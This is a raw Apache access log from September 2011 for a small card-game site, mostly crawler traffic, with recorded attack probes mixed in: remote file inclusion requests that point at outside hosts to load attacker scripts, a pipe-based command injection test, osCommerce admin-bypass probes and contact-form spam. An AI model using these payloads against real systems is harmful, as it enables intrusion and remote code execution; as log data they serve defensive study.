67.195.115.166 - - [12/Sep/2011:03:29:11 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [12/Sep/2011:03:29:12 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.130.8.14 - - [12/Sep/2011:04:53:54 +0000] "GET / HTTP/1.1" 200 749 "http://www.pojo.com/magic/DecksToBeat/index.html" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0"
66.130.8.14 - - [12/Sep/2011:04:53:54 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0"
66.130.8.14 - - [12/Sep/2011:04:53:54 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0"
66.130.8.14 - - [12/Sep/2011:04:53:54 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0"
66.130.8.14 - - [12/Sep/2011:04:53:54 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0"
67.195.115.166 - - [12/Sep/2011:07:23:33 +0000] "GET /Account/?C=N;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
180.76.5.60 - - [12/Sep/2011:08:27:51 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
180.76.5.160 - - [12/Sep/2011:08:42:15 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
119.63.196.73 - - [12/Sep/2011:09:13:13 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.72.210 - - [12/Sep/2011:10:45:03 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.210 - - [12/Sep/2011:10:45:03 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.113.35.162 - - [12/Sep/2011:11:12:45 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
212.113.35.162 - - [12/Sep/2011:11:12:46 +0000] "GET /?C=N;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
212.113.35.162 - - [12/Sep/2011:11:12:47 +0000] "GET /Account/?C=N;O=D HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
212.113.35.162 - - [12/Sep/2011:11:12:49 +0000] "GET /Account/AwstatsDatabase/ HTTP/1.1" 404 339 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
212.113.35.162 - - [12/Sep/2011:11:12:51 +0000] "GET /Account/AwstatsDatabase/?C=D;O=A HTTP/1.1" 404 339 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
212.113.35.162 - - [12/Sep/2011:11:12:53 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 376352 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
66.249.72.210 - - [12/Sep/2011:11:13:22 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.210 - - [12/Sep/2011:11:13:22 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.52.104.89 - - [12/Sep/2011:11:20:37 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [12/Sep/2011:11:21:36 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 377015 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.12.68 - - [12/Sep/2011:11:21:35 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 377015 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; WOW64; Trident/5.0)"
66.90.104.35 - - [12/Sep/2011:11:30:48 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11"
66.90.104.35 - - [12/Sep/2011:11:30:48 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11"
66.90.104.35 - - [12/Sep/2011:11:30:48 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11"
66.90.104.35 - - [12/Sep/2011:11:30:48 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11"
66.90.104.35 - - [12/Sep/2011:11:30:49 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11"
66.90.104.35 - - [12/Sep/2011:11:30:49 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11"
66.90.104.35 - - [12/Sep/2011:11:30:49 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11"
66.90.104.35 - - [12/Sep/2011:11:30:49 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11"
66.90.104.35 - - [12/Sep/2011:11:30:49 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11"
123.125.71.41 - - [12/Sep/2011:13:46:05 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
193.47.80.51 - - [12/Sep/2011:15:48:17 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [12/Sep/2011:15:48:17 +0000] "GET /?C=D;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
95.108.158.245 - - [12/Sep/2011:17:39:55 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
208.80.194.35 - - [12/Sep/2011:17:42:23 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; EZN/PC; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
96.31.69.86 - - [12/Sep/2011:18:14:50 +0000] "GET //include/admin.lib.inc.php?site_path=http://200.67.76.230/lampungcyber/AinuLid1.txt?? HTTP/1.1" 404 340 "-" "Mozilla/5.0"
96.31.69.86 - - [12/Sep/2011:18:14:50 +0000] "GET /Account/access_log.txt//include/admin.lib.inc.php?site_path=http://200.67.76.230/lampungcyber/AinuLid1.txt?? HTTP/1.1" 404 364 "-" "Mozilla/5.0"
96.31.69.86 - - [12/Sep/2011:18:14:51 +0000] "GET /Account//include/admin.lib.inc.php?site_path=http://200.67.76.230/lampungcyber/AinuLid1.txt?? HTTP/1.1" 404 349 "-" "Mozilla/5.0"
175.117.145.48 - - [12/Sep/2011:18:44:26 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','10','7','%22include%2Flib.inc.php%22','',%20'00c64f0b4c7c61186031de63ff11dec246782a08d33225ef41b8',%200)//include/admin.lib.inc.php?site_path=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 559 "-" "MaMa CaSpEr"
175.117.145.48 - - [12/Sep/2011:18:44:26 +0000] "GET //include/admin.lib.inc.php?site_path=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 340 "-" "MaMa CaSpEr"
175.117.145.48 - - [12/Sep/2011:18:44:26 +0000] "GET /Account//include/admin.lib.inc.php?site_path=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 349 "-" "MaMa CaSpEr"
175.117.145.48 - - [12/Sep/2011:18:44:27 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','10','7','%22include%2Flib.inc.php%22','',%20'00c64f0b4c7c61186031de63ff11dec246782a08d33225ef41b8',%200)//include/admin.lib.inc.php?site_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 559 "-" "MaMa CaSpEr"
175.117.145.48 - - [12/Sep/2011:18:44:27 +0000] "GET //include/admin.lib.inc.php?site_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 340 "-" "MaMa CaSpEr"
175.117.145.48 - - [12/Sep/2011:18:44:27 +0000] "GET /Account//include/admin.lib.inc.php?site_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 349 "-" "MaMa CaSpEr"
95.108.158.245 - - [12/Sep/2011:19:15:05 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
74.117.220.14 - - [12/Sep/2011:20:22:32 +0000] "GET /Account/access_log.txt//accounts/inc/errors.php?error=test?? HTTP/1.1" 404 362 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.117.220.14 - - [12/Sep/2011:20:22:33 +0000] "GET /Account/access_log.txt//accounts/inc/errors.php?error=http://box.starindo.net/scanner/star.jpg?? HTTP/1.1" 404 362 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.117.220.14 - - [12/Sep/2011:20:22:34 +0000] "GET /Account/access_log.txt//accounts/inc/errors.php?error=http://box.starindo.net/scanner/indo.jpg?? HTTP/1.1" 404 362 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.117.220.14 - - [12/Sep/2011:20:22:35 +0000] "GET //accounts/inc/errors.php?error=test?? HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.117.220.14 - - [12/Sep/2011:20:22:36 +0000] "GET //accounts/inc/errors.php?error=http://box.starindo.net/scanner/star.jpg?? HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.117.220.14 - - [12/Sep/2011:20:22:37 +0000] "GET //accounts/inc/errors.php?error=http://box.starindo.net/scanner/indo.jpg?? HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.117.220.14 - - [12/Sep/2011:20:22:38 +0000] "GET /Account//accounts/inc/errors.php?error=test?? HTTP/1.1" 404 347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.117.220.14 - - [12/Sep/2011:20:22:39 +0000] "GET /Account//accounts/inc/errors.php?error=http://box.starindo.net/scanner/star.jpg?? HTTP/1.1" 404 347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.117.220.14 - - [12/Sep/2011:20:22:40 +0000] "GET /Account//accounts/inc/errors.php?error=http://box.starindo.net/scanner/indo.jpg?? HTTP/1.1" 404 347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
81.52.143.32 - - [12/Sep/2011:23:03:52 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
180.76.5.14 - - [13/Sep/2011:00:03:00 +0000] "GET /Account/AwstatsDatabase/ HTTP/1.1" 404 339 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
38.101.148.126 - - [13/Sep/2011:00:27:30 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
67.195.115.166 - - [13/Sep/2011:03:30:44 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [13/Sep/2011:03:30:44 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.131.106.3 - - [13/Sep/2011:04:08:46 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.3 - - [13/Sep/2011:04:08:46 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
180.76.5.92 - - [13/Sep/2011:06:34:57 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.71.38 - - [13/Sep/2011:09:24:49 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
180.76.5.97 - - [13/Sep/2011:11:43:11 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
95.108.158.245 - - [13/Sep/2011:12:00:37 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
193.180.166.245 - - [13/Sep/2011:12:13:30 +0000] "GET /Account/access_log.txt HTTP/1.0" 200 386607 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)"
65.52.104.89 - - [13/Sep/2011:12:18:42 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [13/Sep/2011:12:19:31 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 386976 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.218.231.66 - - [13/Sep/2011:18:17:52 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [13/Sep/2011:18:17:52 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
38.108.67.15 - - [13/Sep/2011:19:14:06 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
38.108.67.15 - - [13/Sep/2011:19:14:07 +0000] "GET /Account/AwstatsDatabase/ HTTP/1.0" 404 339 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
207.218.231.66 - - [13/Sep/2011:19:49:44 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [13/Sep/2011:19:49:44 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
207.218.231.66 - - [13/Sep/2011:20:17:34 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [13/Sep/2011:20:17:34 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
207.218.231.66 - - [13/Sep/2011:20:26:18 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [13/Sep/2011:20:26:18 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
61.135.249.198 - - [13/Sep/2011:20:55:51 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
68.180.211.142 - - [13/Sep/2011:22:00:52 +0000] "GET / HTTP/1.1" 200 749 "-" "YahooCacheSystem"
68.180.211.142 - - [13/Sep/2011:22:00:52 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "YahooCacheSystem"
67.195.115.166 - - [13/Sep/2011:22:25:32 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [13/Sep/2011:22:25:32 +0000] "GET /?C=S;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.218.231.66 - - [13/Sep/2011:22:43:37 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [13/Sep/2011:22:43:37 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
173.89.30.29 - - [14/Sep/2011:01:24:29 +0000] "GET / HTTP/1.1" 200 749 "http://www.pojo.com/magic/index.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
173.89.30.29 - - [14/Sep/2011:01:24:29 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
173.89.30.29 - - [14/Sep/2011:01:24:29 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
173.89.30.29 - - [14/Sep/2011:01:24:29 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
173.89.30.29 - - [14/Sep/2011:01:24:29 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
173.89.30.29 - - [14/Sep/2011:01:24:29 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
67.195.115.166 - - [14/Sep/2011:01:51:39 +0000] "GET /Account/?C=M;O=D HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [14/Sep/2011:03:32:21 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [14/Sep/2011:03:32:21 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.218.231.66 - - [14/Sep/2011:05:40:16 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [14/Sep/2011:05:40:16 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
208.80.194.29 - - [14/Sep/2011:05:41:16 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; snprtz|S23210900001030|2600#Service Pack 2#2#5#1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; Media Center PC 3.0)"
216.25.247.244 - - [14/Sep/2011:05:52:26 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 Novarra-Vision/8.0"
216.25.247.246 - - [14/Sep/2011:05:52:26 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 Novarra-Vision/8.0"
178.154.182.65 - - [14/Sep/2011:06:57:41 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
61.135.248.181 - - [14/Sep/2011:08:15:51 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
95.108.158.245 - - [14/Sep/2011:08:40:03 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
207.218.231.66 - - [14/Sep/2011:09:07:32 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [14/Sep/2011:09:07:32 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
95.108.240.251 - - [14/Sep/2011:09:16:25 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
91.121.28.191 - - [14/Sep/2011:09:26:53 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:09:26:53 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:09:27:11 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:09:27:11 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
94.247.27.29 - - [14/Sep/2011:09:27:23 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.825"
94.247.27.29 - - [14/Sep/2011:09:27:23 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.825"
77.223.154.18 - - [14/Sep/2011:09:34:06 +0000] "POST /contact.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
77.223.154.18 - - [14/Sep/2011:09:34:08 +0000] "POST /Account/contact.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
77.223.154.18 - - [14/Sep/2011:09:34:09 +0000] "POST /Account/access_log.txt/contact.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
61.135.249.149 - - [14/Sep/2011:10:51:30 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
91.121.28.191 - - [14/Sep/2011:11:44:18 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:11:44:19 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:11:45:26 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:11:45:27 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
178.154.182.65 - - [14/Sep/2011:12:49:29 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
180.76.5.153 - - [14/Sep/2011:12:59:57 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
91.121.28.191 - - [14/Sep/2011:13:04:45 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:13:04:45 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:13:04:52 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:13:04:53 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
94.247.27.29 - - [14/Sep/2011:13:04:58 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.825"
94.247.27.29 - - [14/Sep/2011:13:04:58 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.825"
61.135.249.77 - - [14/Sep/2011:13:21:57 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
95.108.158.245 - - [14/Sep/2011:13:23:37 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
119.63.196.45 - - [14/Sep/2011:13:57:10 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.52.104.89 - - [14/Sep/2011:14:09:21 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [14/Sep/2011:14:10:05 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 397677 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
